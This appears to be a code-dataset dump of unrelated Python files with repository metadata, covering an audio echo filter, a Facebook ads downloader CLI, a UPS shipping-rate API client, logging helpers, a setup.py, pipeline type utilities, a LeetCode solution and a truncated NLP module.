| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
# echo_with_mic_input.py
import pyaudio
import wave
import struct
from myfunctions import clip16
WIDTH = 2 # Number of bytes per sample
CHANNELS = 1 # mono
RATE = 16000 # Sampling rate (frames/second)
DURATION = 2 # duration of processing (seconds)
N_samples = DURATION * RATE # N : Number of samples to process
print('The number of channels(s) is %d ' % CHANNELS)
print('The frame rate is %d frames/second.' % RATE)
print('There are %d bytes per sample.' % WIDTH)
# Set parameters of delay system
b0 = 1.0 # direct-path gain
G = 0.8 # feed-forward gain
delay_sec = 0.05 # delay in seconds (50 ms); try delay_sec = 0.02 as well
N = int( RATE * delay_sec ) # delay in samples
print('The delay of %.3f seconds is %d samples.' % (delay_sec, N))
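# For example, RATE = 16000 frames/second and delay_sec = 0.05 give
# N = int(16000 * 0.05) = 800 samples of delay.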
# Buffer to store past signal values. Initialize to zero.
BUFFER_LEN = N # length of buffer
buffer = BUFFER_LEN * [0] # list of zeros
# Open an output audio stream
p = pyaudio.PyAudio()
stream = p.open(format = pyaudio.paInt16,
channels = 1,
rate = RATE,
input = True,
output = True )
# Initialize buffer index (circular index)
k = 0
# Write to wave file
wf1 = wave.open('output.wav', 'w') # wf : wave file
num_channels = 1 # mono
# DURATION and RATE were already set above; re-deriving N = DURATION * RATE
# here would shadow the delay length in samples, so the earlier values are
# reused as-is.
wf1.setnchannels(1) # one channel (mono)
wf1.setsampwidth(2) # Two bytes per sample (16 bits per sample)
wf1.setframerate(16000) # samples per second
print('* Start')
for n in range(0, N_samples):
# Get one frame from audio input (microphone)
input_bytes = stream.read(1, exception_on_overflow = False)
# Convert binary data to tuple of numbers
input_number = struct.unpack('h', input_bytes)
print(input_number)
x0=input_number[0]
# Compute output value
# y(n) = b0 x(n) + G x(n-N)
y0 = b0 * x0 + G * buffer[k]
# Update buffer
buffer[k] = x0
# Increment buffer index
k = k + 1
if k >= BUFFER_LEN:
# The index has reached the end of the buffer. Circle the index back to the front.
k = 0
# Clip and convert output value to binary data
output_bytes = struct.pack('h', int(clip16(y0)))
wf1.writeframes(output_bytes)
# Write output value to audio stream
stream.write(output_bytes)
print('* Finished')
stream.stop_stream()
stream.close()
p.terminate()
wf1.close()
|
[
"maying012@gmail.com0"
] |
maying012@gmail.com0
|
7e8f54959ba00bb2e701fd4aa3e06bdcd1633614
|
1cfc8c4b48a85feeab5c45199e69454cc7e01f75
|
/facebook_downloader/cli.py
|
47124b08787a3c6bc60c9c1dedfc867e804f15f5
|
[
"MIT"
] |
permissive
|
swapnil-altsmedia/facebook-ads-performance-downloader
|
7b2b220bc2cf6c20e4fb1ce1c111248a4298af59
|
b60927e8e3b79516de950d2660c8dc5eb410ee48
|
refs/heads/master
| 2021-01-19T20:06:07.486724
| 2017-03-01T09:55:20
| 2017-03-13T16:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,090
|
py
|
"""Command line interface for facebook downloader"""
from functools import partial
import click
from facebook_downloader import config, downloader
def config_option(config_function):
"""Helper decorator that turns an option function into a cli option"""
return lambda function: \
click.option('--' + config_function.__name__,
help=config_function.__doc__.strip() + '. Example: "' + config_function() + '"') \
(function)
def apply_options(kwargs):
"""Applies passed cli parameters to config.py"""
for key, value in kwargs.items():
if value: setattr(config, key, partial(lambda v: v, value))
@click.command()
@config_option(config.app_id)
@config_option(config.app_secret)
@config_option(config.access_token)
@config_option(config.data_dir)
@config_option(config.first_date)
@config_option(config.redownload_window)
def download_data(**kwargs):
"""
Downloads data.
When options are not specified, then the defaults from config.py are used.
"""
apply_options(kwargs)
downloader.download_data()
|
[
"hendrik.makait@project-a.com"
] |
hendrik.makait@project-a.com
|
71430c67e95fb12ba1c50e236cd10864470a4b1f
|
a06fe2de2e7644fe51da23b672d512f471c2cd95
|
/prueba.py
|
843decea70e907e3c30b0d217458426e4583b5b2
|
[] |
no_license
|
ANVRRT/Intelligent-Business-Advisor_OutDated
|
7d9d1963e8c9819fffdabc67da6c7900ef322dd8
|
2c647f2a742a309992b9b2f6797eece9ebd78b51
|
refs/heads/main
| 2023-06-29T23:48:30.867779
| 2021-08-09T21:02:03
| 2021-08-09T21:02:03
| 390,874,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import numpy as np
import pandas as pd
i=1
arch=pd.read_csv('./Supuestosgenerales/Generales/Categorias/categorias.csv')
for i in range (1,6):
arch[f"Año {i}"]=""
arch.loc[0,f'Año {i}']='0'
arch.to_csv("./Supuestosgenerales/Generales/Categorias/categorias2.csv", index=False)
print(arch)
|
[
"albertonavarreteramirez@gmail.com"
] |
albertonavarreteramirez@gmail.com
|
202b635cea301604ed59c0033bda3fbb572bbf3f
|
9407c2981b6fe999891af411678cf69a29f1be2d
|
/ups/__init__.py
|
dcdfa402dd8381ee01ec46e3d84469ad91c76c68
|
[] |
no_license
|
tedshroyer/python-ship
|
91f8a0e60d16ac5d08761e943ce043cf3e8d9d83
|
966dc4a4e85fd2771a664d0d065f62b53cc56f5c
|
refs/heads/master
| 2021-01-17T22:02:28.904997
| 2011-12-21T21:30:04
| 2011-12-21T21:30:04
| 2,279,935
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,397
|
py
|
import logging
logger = logging.getLogger(__name__)
import datetime
import StringIO
import binascii
import urllib2
SERVICES = [
('03', 'UPS Ground'),
('11', 'UPS Standard'),
('01', 'UPS Next Day'),
('14', 'UPS Next Day AM'),
('13', 'UPS Next Day Air Saver'),
('02', 'UPS 2nd Day'),
('59', 'UPS 2nd Day AM'),
('12', 'UPS 3-day Select'),
('65', 'UPS Saver'),
('07', 'UPS Worldwide Express'),
('08', 'UPS Worldwide Expedited'),
('54', 'UPS Worldwide Express Plus'),
]
SERVICES_LOOKUP = dict(SERVICES)
PACKAGES = [
('02', 'Custom Packaging'),
('01', 'UPS Letter'),
('03', 'Tube'),
('04', 'PAK'),
('21', 'UPS Express Box'),
('2a', 'Small Express Box'),
('2b', 'Medium Express Box'),
('2c', 'Large Express Box'),
]
import accessrequest as access_xml
import raterequest as rate_xml
import rateresponse as rate_response_xml
import xavrequest as avs_xml
import xavresponse as avs_response_xml
from pyship import shipping
class UPS(object):
def __init__(self, credentials_dictionary={}, debug=True, username='', password='', account='', license=''):
self.access = access_xml.AccessRequest()
self.access.AccessLicenseNumber = credentials_dictionary.get('access_license', license)
self.access.UserId = credentials_dictionary.get('username', username)
self.access.Password = credentials_dictionary.get('password', password)
self.account = credentials_dictionary.get('shipper_number', account)
self.debug = debug
self.request = None
self.namespacedef = ''
if self.debug:
self.post_url = 'https://wwwcie.ups.com/ups.app/xml/'
else:
self.post_url = 'https://onlinetools.ups.com/ups.app/xml/'
self.post_url_suffix = ''
def make_shipper(self, namespace, from_address, ups_account):
shipper = namespace.ShipperType()
shipper.Name = from_address.company[:35]
if len(shipper.Name) == 0:
shipper.Name = from_address.name[:35]
if ups_account and len(ups_account) > 0:
shipper.ShipperNumber = ups_account
else:
# Fall back to the account from configuration
shipper.ShipperNumber = self.account
shipper.Address = namespace.AddressType()
shipper.Address.AddressLine1 = from_address.address1
shipper.Address.AddressLine2 = getattr(from_address, 'address2', '')
shipper.Address.AddressLine3 = getattr(from_address, 'address3', '')
shipper.Address.City = from_address.city
if from_address.country in ('US', 'CA', 'IE'):
shipper.Address.StateProvinceCode = from_address.state
shipper.Address.PostalCode = from_address.zip
shipper.Address.CountryCode = from_address.country
if from_address.is_residence:
shipper.Address.ResidentialAddressIndicator = ''
return shipper
def make_ship_to(self, namespace, to_address):
ship_to = namespace.ShipToType()
ship_to.Name = to_address.company[:35]
if len(ship_to.Name) == 0:
ship_to.Name = to_address.name[:35]
ship_to.Address = namespace.AddressType()
ship_to.Address.AddressLine1 = to_address.address1
ship_to.Address.AddressLine2 = getattr(to_address, 'address2', '')
ship_to.Address.AddressLine3 = getattr(to_address, 'address3', '')
ship_to.Address.City = to_address.city
if to_address.country in ('US', 'CA', 'IE'):
ship_to.Address.StateProvinceCode = to_address.state
ship_to.Address.PostalCode = to_address.zip
ship_to.Address.CountryCode = to_address.country
if to_address.is_residence:
ship_to.Address.ResidentialAddressIndicator = ''
return ship_to
def verify(self, address, transaction_id = None):
self.post_url_suffix = 'XAV'
self.request = avs_xml.AddressValidationRequest()
self.request.Request = avs_xml.RequestType()
self.request.Request.TransactionReference = avs_xml.TransactionReferenceType()
if transaction_id != None:
self.request.Request.TransactionReference.CustomerContext = str(transaction_id)
else:
self.request.Request.TransactionReference.CustomerContext = datetime.datetime.now().strftime('xav.%Y%m%d.%H%M%S')
self.request.Request.RequestAction = 'XAV'
self.request.Request.RequestOption = 3 # Address Validation w/ Classification (not documented in xml spec)
# Do not set the regional request indicator if using address classification
#self.request.RegionalRequestIndicator = ''
# Maximum Result Candidates default is 15
self.request.MaximumListSize = 5
self.request.AddressKeyFormat = []
address_info = avs_xml.AddressKeyFormatType()
address_info.ConsigneeName = address.name
address_info.AddressLine = [ address.address1, address.address2 ]
address_info.PoliticalDivision2 = address.city
address_info.PoliticalDivision1 = address.state
address_info.PostcodePrimaryLow = address.zip
address_info.CountryCode = address.country
self.request.AddressKeyFormat.append(address_info)
response = self.send()
response_xml = avs_response_xml.parseString(response)
parsed_response = {
'status' : response_xml.Response.ResponseStatusDescription,
'transaction_id' : response_xml.Response.TransactionReference.CustomerContext,
'candidates' : []}
if response_xml.AddressClassification:
parsed_response['class_code'] = response_xml.AddressClassification.Code
parsed_response['class_description'] = response_xml.AddressClassification.Description
parsed_response['valid'] = response_xml.ValidAddressIndicator == True
parsed_response['ambiguous'] = response_xml.AmbiguousAddressIndicator == True
parsed_response['no_candidates'] = response_xml.NoCandidatesIndicator == True
if not parsed_response['no_candidates']:
for candidate in response_xml.AddressKeyFormat:
name = candidate.ConsigneeName
if name == None:
name = ''
a = shipping.Address(
name,
candidate.AddressLine[0],
candidate.PoliticalDivision2,
candidate.PoliticalDivision1,
candidate.PostcodePrimaryLow,
candidate.CountryCode)
if len(candidate.AddressLine) > 1:
a.address2 = candidate.AddressLine[1]
if a not in parsed_response['candidates']:
parsed_response['candidates'].append(a)
return parsed_response
validate = verify
def rate(self, packages, packaging_type, from_address, to_address, ups_account=None, rate_type='00', service_type=None, transaction_id=None):
self.post_url_suffix = 'Rate'
self.request = rate_xml.RatingServiceSelectionRequest()
self.request.Request = rate_xml.RequestType()
self.request.Request.TransactionReference = rate_xml.TransactionReferenceType()
if transaction_id != None:
self.request.Request.TransactionReference.CustomerContext = str(transaction_id)
else:
self.request.Request.TransactionReference.CustomerContext = datetime.datetime.now().strftime('rate.%Y%m%d.%H%M%S')
self.request.Request.RequestAction = 'Rate'
self.request.Request.RequestOption = 'Shop'
self.request.PickupType = rate_xml.CodeType()
self.request.PickupType.Code = '01' # Using Daily Pickup
self.request.CustomerClassification = rate_xml.CodeType()
self.request.CustomerClassification.Code = rate_type
self.request.Shipment = rate_xml.ShipmentType()
self.request.Shipment.RateInformation = rate_xml.RateInformationType()
self.request.Shipment.RateInformation.NegotiatedRatesIndicator = ''
if service_type:
# Set the service type if needed
self.request.Shipment.Service = rate_xml.CodeDescriptionType()
self.request.Shipment.Service.Code = service_type
self.request.Shipment.Shipper = self.make_shipper(rate_xml, from_address, ups_account)
self.request.Shipment.ShipTo = self.make_ship_to(rate_xml, to_address)
self.request.Shipment.Package = []
for p in packages:
package = rate_xml.PackageType()
package.PackagingType = rate_xml.PackagingTypeType()
package.PackagingType.Code = packaging_type
package.Dimensions = rate_xml.DimensionsType()
package.Dimensions.UnitOfMeasurement = rate_xml.UnitOfMeasurementType()
package.Dimensions.UnitOfMeasurement.Code = 'IN' #Other choice is CM
package.Dimensions.Length = p.length
package.Dimensions.Width = p.width
package.Dimensions.Height = p.height
package.PackageWeight = rate_xml.WeightType()
package.PackageWeight.UnitOfMeasurement = rate_xml.UnitOfMeasurementType()
package.PackageWeight.UnitOfMeasurement.Code = 'LBS' #Other choice is KGS
package.PackageWeight.Weight = p.weight
# Always declare a value for insurance when rating
package.PackageServiceOptions = rate_xml.PackageServiceOptionsType()
package.PackageServiceOptions.InsuredValue = rate_xml.InsuredValueType()
package.PackageServiceOptions.InsuredValue.MonetaryValue = p.value or 100
package.PackageServiceOptions.InsuredValue.CurrencyCode = 'USD'
if p.require_signature:
package.PackageServiceOptions.DeliveryConfirmation = rate_xml.DeliveryConfirmationType()
# Valid values are:
# 1 - Delivery Confirmation;
# 2 - Delivery Confirmation Signature Required;
# 3 - Delivery Confirmation Adult Signature Required
if type(p.require_signature) == int and p.require_signature in (1, 2, 3):
package.PackageServiceOptions.DeliveryConfirmation.DCISType = p.require_signature
else:
# Pick 1 for signature required, 2 for adult signature.
package.PackageServiceOptions.DeliveryConfirmation.DCISType = 1
self.request.Shipment.Package.append(package)
response = self.send()
response_xml = rate_response_xml.parseString(response)
info = []
for r in response_xml.RatedShipment:
try:
cost = r.NegotiatedRateCharges.TotalCharge.MonetaryValue
except AttributeError:
cost = r.TotalCharges.MonetaryValue
info.append({
'service': SERVICES_LOOKUP.get(r.Service.Code, 'Unknown Service: {}'.format(r.Service.Code)),
'package': '',
'delivery_day': '',
'cost': cost
})
parsed_response = {
'status' : response_xml.Response.ResponseStatusDescription,
'transaction_id' : response_xml.Response.TransactionReference.CustomerContext,
'info' : info}
return parsed_response
def label(self, packages, packaging_type, service_type, from_address, to_address, email_alert=None, evening=False, payment=None, delivery_instructions=''):
pass
def send(self):
data = StringIO.StringIO()
data.write('<?xml version="1.0" ?>\n')
self.access.export(data, 0, namespacedef_=self.namespacedef)
data.write('<?xml version="1.0" ?>\n')
self.request.export(data, 0, namespacedef_=self.namespacedef)
data = data.getvalue()
data = data.encode('ascii')
logger.debug('XML Request:\n%s' % data)
request = urllib2.Request(self.post_url + self.post_url_suffix)
request.add_data(data)
request.add_header('Accept', 'image/gif, image/jpeg, image/pjpeg, text/plain, text/html, */*')
request.add_header('Content-Type', 'text/xml')
request.add_header('Content-length', str(len(data)))
# Get the response
response = urllib2.urlopen(request)
if response.code != 200:
logger.error('HTTP Error %s' % str(response.code))
raise Exception('HTTP Error %s' % str(response.code))
response_data = response.read()
logger.debug('XML Response:\n%s' % response_data)
return response_data
Ups = UPS
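# Minimal usage sketch (all credential values are placeholders, and the
# package/address objects are assumed to be pyship shipping.Package and
# shipping.Address instances):
#
# ups = Ups({'username': 'user', 'password': 'pass',
#            'shipper_number': '123456', 'access_license': 'XYZ'}, debug=True)
# quote = ups.rate([package], '02', from_address, to_address)  # '02' = Custom Packaging
# for option in quote['info']:
#     print('%s: $%s' % (option['service'], option['cost']))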
|
[
"tedshroyer@gmail.com"
] |
tedshroyer@gmail.com
|
6bdbf8c569a7e5e03f81924aa3e808424180af0e
|
8354d7f388d1ceb4c270b1b3023ab0bd3fbb91f2
|
/recordLoggerId.py
|
9798ebffefb5a8442e8c6f87ad7f377786878633
|
[] |
no_license
|
vathymut/pynha
|
bc901ed4c3da65e033695232fe9afe2f3f7e7ba4
|
37041a0aa4b1e2401b730c82f0d85e30ad7ef8d6
|
refs/heads/master
| 2020-05-25T09:50:11.880983
| 2015-01-20T19:46:39
| 2015-01-20T19:46:39
| 28,049,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,633
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Vathy M. Kamulete
"""
from __future__ import division
from ioFunc import gen_issuer_names, create_issuer_dir, safe_delete, create_dir
from contextlib import contextmanager
from os import walk, remove, getcwd, chdir
from os.path import dirname, abspath, join, exists
import csv
# Declare functions to import
__all__ = [ 'write_successes_to_csv', 'write_summ_loggers_to_csv', \
'log_exceptions', 'delete_log_files', 'create_log_folders', \
'delete_csv_from_loggers', 'get_stats_from_loggers' ]
def write_successes_to_log( dir_to_log, content, logging_dir = 'logging_rates' ):
"""
Write successes to log 'success.txt'.
dir_to_log is the issuer for which the information belongs.
content is the info to write to csv.
"""
filename = join( HOMEDIR, logging_dir, dir_to_log, 'success.txt' )
with open( filename, 'a+' ) as f:
f.write( content + '\n' )
def write_failures_to_log( dir_to_log, content, logging_dir = 'logging_rates' ):
"""
Write failures to log 'failure.txt'.
    dir_to_log is the issuer to which the information belongs.
content is the info to write to csv.
"""
filename_fullpath = join( HOMEDIR, logging_dir, dir_to_log, 'failure.txt' )
with open( filename_fullpath, 'a+' ) as f:
f.write( content + '\n' )
def write_successes_to_csv( dir_to_log, content, result_type = 'rates' ):
"""
Write successes to csv.
result_type is the type of the info: rates, dates, no. of mortgages, etc
    dir_to_log is the issuer to which the information belongs.
content is the info to write to csv.
"""
filename = result_type + '.csv'
filename_fullpath = join( HOMEDIR, result_type, dir_to_log, filename )
file_exists = exists( filename_fullpath )
with open( filename_fullpath, 'ab+' ) as f:
f_csv = csv.writer( f )
if not file_exists:
# Write the column headers.
# content must be a namedtuple with attributes _fields.
f_csv.writerow( content._fields )
f_csv.writerow( content )
def write_summary_logs( summ_list, filepath ):
"""
Write summary logs to csv file.
"""
COL_FIELDS = [ 'issuer', 'no_failed', 'no_succeeded', 'success_rate' ]
create_dir( dirname( filepath ) )
with open( filepath, 'wb' ) as f:
f_csv = csv.writer( f )
f_csv.writerow( COL_FIELDS )
for row in summ_list:
f_csv.writerow( row )
def write_summ_loggers_to_csv( summ_list, result_type = 'rates', summ_dir = 'summ_loggers' ):
"""
Write summary logs summ_list to csv file
result_type in the folder summ_dir.
"""
no_issuers = len( summ_list )
overwrite_log = no_issuers == len( list( gen_issuer_names() ) )
if not overwrite_log:
print 'Processed %s issuer(s) -- Not overwriting log folder' % ( no_issuers )
return
filename = 'summ_' + result_type + '.csv'
filename_fullpath = join( HOMEDIR, summ_dir, filename )
print 'Overwriting log folder'
write_summary_logs( summ_list = summ_list, filepath = filename_fullpath )
@contextmanager
def log_exceptions( dir_to_log, content, logging_dir, test_run = True ):
"""
Log exceptions when trying to extract .csv info.
"""
try:
yield
if not test_run: # Log success
write_successes_to_log( dir_to_log, content, logging_dir = logging_dir )
except ( ValueError, TypeError ) as err:
print '\t%s: %s\n' % ( type(err), err.message )
write_failures_to_log( dir_to_log, content, logging_dir = logging_dir )
def delete_log_files( pattern_str, default_start_walk = 'logging_rates' ):
"""
Delete files if the pattern pattern_str matches the filename.
"""
args = default_start_walk.split()
start_dir = join( HOMEDIR, *args )
for dirpath, _, filenames in walk( start_dir ):
for f in filenames:
filepath = join( dirpath, f)
if pattern_str in filepath:
print 'Logger deleted: %s' % ( filepath )
remove( filepath )
def create_log_folders( results_folder = 'rates' , \
logging_dir = None, \
debug_print = False ):
"""
Create folders to log files that failed to parse.
"""
if logging_dir is None:
logging_dir = 'logging_' + results_folder
for issuer in gen_issuer_names( ):
create_issuer_dir( issuer, prefix_path = logging_dir, debug_print = debug_print )
create_issuer_dir( issuer, prefix_path = results_folder, debug_print = debug_print )
def gen_loggers_path( keep_list = None, logging_folder = 'logging_rates' ):
"""
Generate path to the logging directories in logging_folder.
Get all issuers' path if keep_list is None.
Otherwise get only issuers' path in keep_list.
"""
for issuer in gen_issuer_names():
if keep_list and issuer not in keep_list:
continue
logpath = join( HOMEDIR, logging_folder, issuer )
yield logpath, issuer
def gen_csvfailed_path( ):
"""
Generate filepaths to csv files in failure.txt
that failed to parse.
"""
csvpaths = open( 'failure.txt' , 'r' ).readlines()
csvpaths = [ f.replace( '\n', '' ) for f in csvpaths ]
for csvpath in csvpaths:
yield csvpath
def delete_csv_from_loggers( issuers_list, logging_folder = 'logging_rates' ):
"""
Delete csv files in folder csv_raw for issuer in issuers_list
if the file is in the failure log.
"""
CURRDIR = getcwd( )
try:
for logpath, issuer in gen_loggers_path( issuers_list, logging_folder ):
chdir( logpath )
if not exists( 'failure.txt' ):
continue
for csvpath in gen_csvfailed_path( ):
# CSVDIR is a global variable (set elsewhere)
# CSVDIR is either: /pynha_csv/csv_raw or /pynha_csv/csv_firstpage
csv_fullpath = join( CSVDIR, issuer, csvpath )
safe_delete( csv_fullpath )
finally:
chdir( CURRDIR )
print 'Done'
def count_lines( fname ):
"""
Get a line count. If file doesn't exist, return 0.
Adapted from StackOverflow:
http://stackoverflow.com/q/845058/1965432
"""
if not exists( fname ):
return 0
    with open( fname ) as f:
        i = -1  # covers an empty file, where the loop body never runs
        for i, l in enumerate( f ):
            pass
    return i + 1
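# e.g. count_lines('success.txt') returns the number of logged successes,
# and 0 when the file is missing or empty.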
def summ_issuer_logs():
"""
Return summary stats for issuer about the number of files
in failure.txt and success.txt. Function assumes that
current directory is the logging directory.
"""
success_count = count_lines( 'success.txt' )
failure_count = count_lines( 'failure.txt' )
try:
success_rate = success_count/( success_count + failure_count )
except ( ZeroDivisionError, ) as err:
success_rate = 'TODO'
return failure_count, success_count, success_rate
def get_stats_from_loggers( issuers_list, logging_folder = 'logging_rates' ):
"""
Call summ_issuer_logs for each issuer in issuers_list
and returns stats from the logging_folder.
"""
results_list = list( )
for logpath, issuer in gen_loggers_path( issuers_list, logging_folder ):
chdir( logpath )
failure_count, success_count, success_rate = summ_issuer_logs( )
issuer_infolist = [ issuer, failure_count, success_count, success_rate ]
results_list.append( issuer_infolist )
return results_list
if __name__ == '__main__' :
# Include tests here if needed
print 'Leave blank for now'
|
[
"vathymut@gmail.com"
] |
vathymut@gmail.com
|
61b29b234ac538819a506f9b35ad04235d880747
|
6e1f550b71e212cec90f070e2e9a1dd714de55d6
|
/setup.py
|
1586e43ed05c743040c5c403f039e0139055220a
|
[
"MIT"
] |
permissive
|
wbond/gears-libsass
|
b4f7986ffa642b79a5b1ab3125c9d9056d6777fc
|
a861089306572b5250c3d3716abd916dc140fa20
|
refs/heads/master
| 2020-04-10T06:21:20.079859
| 2018-12-07T17:09:42
| 2018-12-07T17:09:42
| 160,851,933
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
import os
from setuptools import setup, find_packages
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
setup(
name='gears-libsass',
version='0.1.0',
url='https://github.com/wbond/gears-libsass',
license='MIT',
author='Will Bond',
author_email='will@wbond.net',
description='Python libsass-based SCSS compiler for Gears',
long_description=read('README.rst'),
packages=find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
install_requires=[
"libsass >= 0.16.1"
],
)
|
[
"will@wbond.net"
] |
will@wbond.net
|
9cf95ea8c8587547eda0ba121e569f8022e1aa55
|
19172e15355d4ef8ae4622d0ed6993c0cd4d80ea
|
/watchmen/pipeline/single/stage/unit/utils/units_func.py
|
1092797ba1dbe85e75457093d67cdc1b76bc612d
|
[
"MIT"
] |
permissive
|
TSRAW/watchmen-matryoshka-doll
|
d5b50fc4014fbea11c2765f377ca904d17a4c579
|
ab17e36a0f26f8e461296a222e6f7f2a4532c877
|
refs/heads/master
| 2023-03-18T05:40:08.354019
| 2021-03-17T15:52:34
| 2021-03-17T15:52:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,313
|
py
|
from datetime import datetime
from watchmen.common.constants import parameter_constants, pipeline_constants
from watchmen.topic.factor.factor import Factor
from watchmen.topic.topic import Topic
INSERT = "insert"
UPDATE = "update"
SEQUENCE = "sequence"
NUMBER = "number"
UNSIGNED = "unsigned" # 0 & positive
TEXT = "text"
# address
ADDRESS = "address"
CONTINENT = "continent"
REGION = "region"
COUNTRY = "country"
PROVINCE = "province"
CITY = "city"
DISTRICT = "district"
ROAD = "road"
COMMUNITY = "community"
FLOOR = "floor"
RESIDENCE_TYPE = "residence-type"
RESIDENTIAL_AREA = "residential-area"
EMAIL = "email"
PHONE = "phone"
MOBILE = "mobile"
FAX = "fax"
DATETIME = "datetime" # YYYY - MM - DD
DATE = "date" # YYYY - MM - DD
TIME = "time" # HH: mm:ss
YEAR = "year" # 4
HALF_YEAR = "half-year" # 1: first
QUARTER = "quarter" # 1 - 4
SEASON = "season" # 1: spring, 2: summer, 3: autumn, 4: winter
MONTH = "month" # 1 - 12
HALF_MONTH = "half-month" # 1: first
TEN_DAYS = "ten-days" # 1, 2, 3
WEEK_OF_YEAR = "week-of-year" # 1 - 53
WEEK_OF_MONTH = "week-of-month" # 1 - 6
HALF_WEEK = "half-week" # 1: first
DAY_OF_MONTH = "day-of-month" # 1 - 31, according
DAY_OF_WEEK = "day-of-week" # 1 - 7
DAY_KIND = "day-kind" # 1: workday, 2: weekend, 3: holiday
HOUR = "hour" # 0 - 23
HOUR_KIND = "hour-kind" # 1: work
MINUTE = "minute" # 0 - 59
SECOND = "second" # 0 - 59
AM_PM = "am-pm" # 1, 2
# individual
GENDER = "gender"
OCCUPATION = "occupation"
DATE_OF_BIRTH = "date-of-birth" # YYYY - MM - DD
AGE = "age"
ID_NO = "id-no"
RELIGION = "religion"
NATIONALITY = "nationality"
# organization
BIZ_TRADE = "biz-trade"
BIZ_SCALE = "biz-scale"
BOOLEAN = "boolean"
ENUM = "enum"
OBJECT = "object"
ARRAY = "array"
def check_condition(operator, left_value, right_value):
if operator == "equals":
return left_value == right_value
elif operator == "not-equals":
return left_value != right_value
elif operator == "less":
return left_value < right_value
elif operator == "less-equals":
return left_value <= right_value
elif operator == "more":
return left_value > right_value
elif operator == "more-equals":
return left_value >= right_value
else:
raise Exception("NotImplemented:", operator)
def convert_factor_type(value, factor_type):
if factor_type == TEXT:
return str(value)
elif factor_type == NUMBER:
# TODO process number type
return float(value)
elif factor_type == DATETIME:
return datetime.fromisoformat(value)
elif factor_type == BOOLEAN:
return bool(value)
elif factor_type == SEQUENCE:
return int(value)
elif factor_type == YEAR:
return int(value)
elif factor_type == MONTH:
return int(value)
elif factor_type == TIME:
return round(value * 1000)
else:
return value
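# Illustrative conversions (values below are made up for the sketch):
#   convert_factor_type("42", NUMBER)           -> 42.0
#   convert_factor_type("2021-03-17", DATETIME) -> datetime(2021, 3, 17, 0, 0)
#   convert_factor_type(1.234, TIME)            -> 1234   (value * 1000, rounded)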
def build_factor_dict(topic: Topic):
factor_dict = {}
for factor in topic.factors:
factor_dict[factor.factorId] = factor
return factor_dict
def get_factor(factor_id, target_topic):
for factor in target_topic.factors:
if factor.factorId == factor_id:
return factor
def get_execute_time(start_time):
time_elapsed = datetime.now() - start_time
execution_time = time_elapsed.microseconds / 1000
return execution_time
def get_value(factor: Factor, data):
    if factor.name in data:
        value = data[factor.name]
        return convert_factor_type(value, factor.type)
    # factor not present in the record: no value, regardless of factor type
    return None
def add_audit_columns(dictionary, audit_type):
if audit_type == INSERT:
dictionary[pipeline_constants.INSERT_TIME] = datetime.now()
elif audit_type == UPDATE:
dictionary[pipeline_constants.UPDATE_TIME] = datetime.now()
else:
raise Exception("unknown audit_type")
def add_trace_columns(dictionary, trace_type, pipeline_uid):
dictionary[trace_type] = pipeline_uid
def process_variable(variable_name):
if variable_name.startswith("{"):
return "memory", variable_name.replace("{", "").replace("}", "")
else:
return parameter_constants.CONSTANT, variable_name
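# Usage sketch: a braced name is read from pipeline memory, anything else is
# treated as a constant (the variable names below are hypothetical):
#   process_variable("{order_count}") -> ("memory", "order_count")
#   process_variable("42")            -> (parameter_constants.CONSTANT, "42")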
|
[
"luke0623@outlook.com"
] |
luke0623@outlook.com
|
97d31bc99318da98c36566bc2f7a502e1953d6d9
|
54e4c1a57765519c77d04fc02112c7f3bbacc595
|
/prob_1317.py
|
11e01b22fc965fafc4a81f4f1b4e4ef0ee88e358
|
[] |
no_license
|
Hrishikesh-3459/leetCode
|
80a864228a8a2ae41ac2623f970a13f409234eed
|
42def57b8f70d179ca688314ae43747fc1e410a0
|
refs/heads/master
| 2023-05-07T01:37:19.375229
| 2021-05-25T01:58:05
| 2021-05-25T01:58:05
| 254,803,743
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 744
|
py
|
class Solution:
def sortString(self, s: str) -> str:
x = list(s)
ans = []
ans_2 = []
fin = []
count = 0
while True:
for i in sorted(x):
if (i not in ans):
ans.append(i)
count +=1
x.pop(x.index(i))
for j in sorted(x)[::-1]:
if (j not in ans_2):
count +=1
ans_2.append(j)
x.pop(x.index(j))
fin += ans + ans_2
if (count == len(s)):
break
ans.clear()
ans_2.clear()
ans_str = ""
for j in fin:
ans_str += j
return ans_str
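# Quick illustration (LeetCode's "Increasing Decreasing String"):
#   Solution().sortString("aaaabbbbcccc") -> "abccbaabccba"
# Each pass appends the distinct remaining characters in ascending then
# descending order, until every character of s has been consumed.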
|
[
"noreply@github.com"
] |
noreply@github.com
|
fc49527e3308118e7a6f32d4d744ba81f26db2a1
|
a7a5f39c2e95ac1317c6cd786517e028991c779a
|
/Analysis/use_cases.py
|
4a67fd300ba050e038fc21fb12c1fcdc508eeaf5
|
[] |
no_license
|
wojtunikd/requml-py
|
3a8eb259b70b9e604a0cdd150b47c81dd54e77d2
|
11c67050eae5447d484e75eae600173dd1cae446
|
refs/heads/main
| 2023-07-16T18:22:13.806273
| 2021-08-29T15:52:07
| 2021-08-29T15:52:07
| 380,573,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,980
|
py
|
from Analysis.preprocessing import removePunctuation, getDomainSpecificWords, getPOSExclusion, getDependencyPhrases, recogniseAndRemoveBenefit
from nltk import WordNetLemmatizer, word_tokenize, pos_tag
from nltk.corpus import wordnet
from nltk.corpus.reader.wordnet import WordNetError
import spacy
import copy
nlp = spacy.load("en_core_web_sm")
lemmatizer = WordNetLemmatizer()
def verifyPhraseDomainWords(phrase):
words = phrase.split()
